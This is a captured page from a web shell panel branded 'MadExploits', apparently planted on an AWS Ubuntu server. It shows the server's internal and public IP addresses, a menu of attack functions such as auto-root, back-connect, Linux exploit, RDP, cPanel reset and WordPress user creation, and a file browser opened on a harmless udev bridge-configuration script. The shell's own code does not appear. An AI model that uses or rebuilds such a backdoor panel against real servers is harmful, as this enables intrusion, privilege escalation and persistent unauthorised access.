Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.221.70.17
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
16928 /
lib /
udev /
[ HOME SHELL ]
Name
Size
Permission
Action
hwdb.d
[ DIR ]
drwxr-xr-x
rules.d
[ DIR ]
drwxr-xr-x
ata_id
38.42
KB
-rwxr-xr-x
bridge-network-interface
1.05
KB
-rwxr-xr-x
cdrom_id
50.42
KB
-rwxr-xr-x
collect
22.34
KB
-rwxr-xr-x
console-setup-tty
4.52
KB
-rwxr-xr-x
hotplug.functions
1.15
KB
-rw-r--r--
hwclock-set
776
B
-rwxr-xr-x
hwdb.bin
6.52
MB
-r--r--r--
ifupdown-hotplug
3.07
KB
-rwxr-xr-x
mtd_probe
10.25
KB
-rwxr-xr-x
scsi_id
50.95
KB
-rwxr-xr-x
snappy-app-dev
38.64
KB
-rwxr-xr-x
v4l_id
14.34
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bridge-network-interface
#!/bin/sh # bridge-network-interface - configure a network bridge # # This service checks whether a physical network device that has been added # is one of the ports in a bridge config, and if so, brings up the related # bridge set -e if [ -z "$INTERFACE" ]; then echo "missing \$INTERFACE" >&2 exit 1 fi #default configuration BRIDGE_HOTPLUG=no [ -f /etc/default/bridge-utils ] && . /etc/default/bridge-utils [ "$BRIDGE_HOTPLUG" = "no" ] && exit 0 . /lib/bridge-utils/bridge-utils.sh if [ -d /run/network ]; then for i in $(ifquery --list --allow auto); do ports=$(ifquery $i | sed -n -e's/^bridge[_-]ports: //p') for port in $(bridge_parse_ports $ports); do case $port in $INTERFACE|$INTERFACE.*) if [ ! -d /sys/class/net/$port ] && [ -x /etc/network/if-pre-up.d/vlan ]; then IFACE=$port /etc/network/if-pre-up.d/vlan fi if [ -d /sys/class/net/$port ]; then if [ ! -d /sys/class/net/$i ]; then brctl addbr $i fi brctl addif $i $port && ip link set dev $port up fi break ;; esac done done fi
Close